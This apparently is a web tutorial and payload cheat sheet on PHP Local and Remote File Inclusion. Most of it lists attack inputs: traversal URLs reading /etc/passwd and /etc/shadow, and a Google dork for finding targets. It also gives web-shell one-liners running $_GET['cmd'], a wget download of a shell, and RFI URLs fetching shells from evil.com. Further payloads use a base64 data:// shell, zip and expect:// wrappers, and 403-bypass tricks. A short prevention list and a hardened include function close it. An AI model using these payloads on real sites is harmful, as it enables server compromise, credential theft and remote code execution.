LFI And RFI – The Website Security Vulnerabilities

LFI And RFI Vulnerabilities

LFI (Local File Inclusion) and RFI (Remote File Inclusion) – The Website Security Vulnerabilities

A file inclusion vulnerability is a type of vulnerability that most commonly affects web applications that rely on a scripting runtime. The issue arises when an application builds a path to executable code using an attacker-controlled variable in a way that lets the attacker control which file is executed at run time.

A file include vulnerability is distinct from a generic Directory Traversal Attack, in that directory traversal is a way of gaining unauthorized file system access, and a file inclusion vulnerability subverts how an application loads code for execution. Successful exploitation of a file include vulnerability will result in remote code execution on the web server that runs the affected web application.

Local File Inclusion:

Local File Inclusion (LFI) is similar to a Remote File Inclusion vulnerability, except that instead of including remote files, only local files, i.e. files on the current server, can be included for execution. This issue can still lead to remote code execution by including a file that contains attacker-controlled data, such as the web server's access logs.

Example of LFI

Type of call:
require($file);
Exploit:
http://host/?file=/etc/passwd

Type of call:
require("includes/".$file);
Exploit:
http://host/?file=../../../../../etc/passwd

Type of calls:
require("languages/".$lang.".php");
require("themes/".$theme."/config.php");
Exploit:
http://host/?file=../../../../../etc/passwd%00

Type of call:
require("languages/".$_COOKIE['lang'].".php");
Exploit:
javascript:document.cookie = "lang=../../../../../etc/passwd%00";

That is, the script includes a file from the server and renders it in our browser:
<?php include($_GET['page']); ?>

Google dork: inurl:.php?page=
Example: www.xyz.com/contacts.php?page=abc.php
www.xyz.com/abc.php?id=5
Test: www.xyz.com/contacts.php?page=../xyz.php

On a Linux server there is an /etc/passwd file, which contains the username and password of all the domains hosted on the same server (on modern systems the password hashes themselves are kept in /etc/shadow, which is readable only by root):
1. www.abc.org/index.php?page=../../../../etc/passwd%00
2. www.abc.com/index.php?page=../../../../etc/passwd

/proc/self/environ is a file writable by the end user,
or /var/log/httpd-access.log is also writable.
/usr/local/apache/conf/httpd.conf -> gives the path of all log files
<?php passthru($_GET['cmd']); ?>
<?php system($_GET['cmd']); ?>
<?php exec($_GET['cmd']); ?>
wget http://xyz.com/abc.txt -O shell.php

How to Test Local File Inclusion

Since LFI occurs when paths passed to "include" statements are not properly sanitized, in a black-box testing approach we should look for scripts that take filenames as parameters.

Consider the following example:

http://vulnerable_host/preview.php?file=example.html

This looks like a perfect place to try for LFI. If the attacker is lucky and the script, instead of selecting the appropriate page from an array by its name, directly includes the input parameter, it is possible to include arbitrary files on the server.

A typical proof of concept would be to load the passwd file:

http://vulnerable_host/preview.php?file=../../../../etc/passwd

Remote File Inclusion:

Remote File Inclusion (RFI) occurs when the web application downloads and executes a remote file. These remote files are usually obtained in the form of an HTTP or FTP URI as a user-supplied parameter to the web application.

RFI – Remote file inclusion

If allow_url_include is On in php.ini, then we can inject a shell directly.

You only need to pass, by GET or POST, a URI that points directly to the shell (using a non-PHP extension):
www.xyz.com/contacts.php?page=http://www.abc.com/shell.php

How To Test RFI

Since RFI occurs when paths passed to "include" statements are not properly sanitized, in a black-box testing approach we should look for scripts that take filenames as parameters. Consider the following PHP example:

$incfile = $_REQUEST["file"];
include($incfile.".php");

In this example the path is extracted from the HTTP request and no input validation is done (for example, by checking the input against a whitelist), so this snippet of code is vulnerable to this type of attack. Consider in fact the following URL:

http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page

In this case the remote file is going to be included and any code contained in it is going to be run by the server.

Basic LFI (null byte, double encoding and other tricks):

http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd

Interesting files to check out:

/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline

Basic RFI (null byte, double encoding and other tricks):

http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt

LFI / RFI Wrappers:

LFI wrapper rot13 and base64: the php://filter wrapper, whose name is matched case-insensitively.

http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php

Can be chained with a compression wrapper.
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd

LFI Wrapper ZIP:

echo '<pre><?php system($_GET["cmd"]); ?></pre>' > payload.php
zip payload.zip payload.php
mv payload.zip shell.jpg
rm payload.php

http://example.com/index.php?page=zip://shell.jpg%23payload.php

RFI Wrapper DATA with base64-encoded payload:

http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=

RFI Wrapper EXPECT:

http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls

XSS via RFI/LFI with base64-encoded payload:

http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+

LFI to RCE via Upload:

http://example.com/index.php?page=path/to/uploaded/file.png

Miscellaneous PayLoads and Tricks

GET /page.php?path=../../etc/passwd

Forbidden 403?

Try One Of These:

(1) ../../../etc/passwd%00

(2) ....//....//....//etc/passwd

(3) %252e%252e%252fetc%252fpasswd

Prevention from LFI and RFI Attacks

  • Use Vulnerability Scanners
  • Use Web Application Firewall (WAF)
  • Fix your code so that it is secure: include only files chosen from a fixed allow-list, never a path built from user input.
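As an added example (not code from the original post), here is a hardened replacement for the vulnerable include($incfile.".php") pattern shown above: it enforces an allow-list and a realpath() boundary so that the null-byte, double-encoding, ....// and wrapper payloads listed on this page are rejected and logged rather than included. The function names, the pages/ directory and the page names are assumptions, and it needs PHP 8 for str_contains()/str_starts_with().

```php
<?php
// Added example, not code from the original post: a hardened replacement for the
// vulnerable include($_REQUEST["file"] . ".php"). Function names are hypothetical; needs PHP 8.

// $_GET is already URL-decoded once; decode until stable (bounded) so %252e%252e%252f becomes ../
function fully_decode(string $value): string
{
    for ($i = 0; $i < 5 && ($d = rawurldecode($value)) !== $value; $i++) {
        $value = $d;
    }
    return $value;
}
// Returns null when the value is acceptable, otherwise a short reason for the SOC log.
function validate_include_param(string $raw, array $allowed): ?string
{
    $value = fully_decode($raw);
    if (str_contains($value, "\0")) {
        return 'null byte';              // %00 suffix-truncation trick
    }
    if (preg_match('~^[a-z][a-z0-9+.\-]*:~i', $value) === 1) {
        return 'wrapper or URL';         // php://, zip://, data:, expect://, http://
    }
    if (str_contains($value, '..') || str_contains($value, '/') || str_contains($value, '\\')) {
        return 'path traversal';         // ../, ....//, absolute paths
    }
    if (!in_array($value, $allowed, true)) {
        return 'not in allow-list';      // only fixed page names may be included
    }
    return null;
}
// Include only an allow-listed page, then confirm with realpath() that the resolved
// file still sits inside $baseDir. Returns false (with a status code set) on rejection.
function safe_include(string $raw, array $allowed, string $baseDir): bool
{
    if (($reason = validate_include_param($raw, $allowed)) !== null) {
        error_log("rejected include parameter ({$reason}): " . bin2hex($raw)); // hex: no log poisoning
        http_response_code(400);
        return false;
    }
    $base   = realpath($baseDir);
    $target = realpath($baseDir . '/' . fully_decode($raw) . '.php');
    if ($base === false || $target === false || !str_starts_with($target, $base . DIRECTORY_SEPARATOR)) {
        http_response_code(404);
        return false;
    }
    include $target;
    return true;
}

safe_include($_GET['page'] ?? 'home', ['home', 'contacts', 'about'], __DIR__ . '/pages');
```

The rejection reason written by error_log() is what a detection rule can key on; logging the raw value hex-encoded keeps the attacker from poisoning the log with PHP code of their own.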

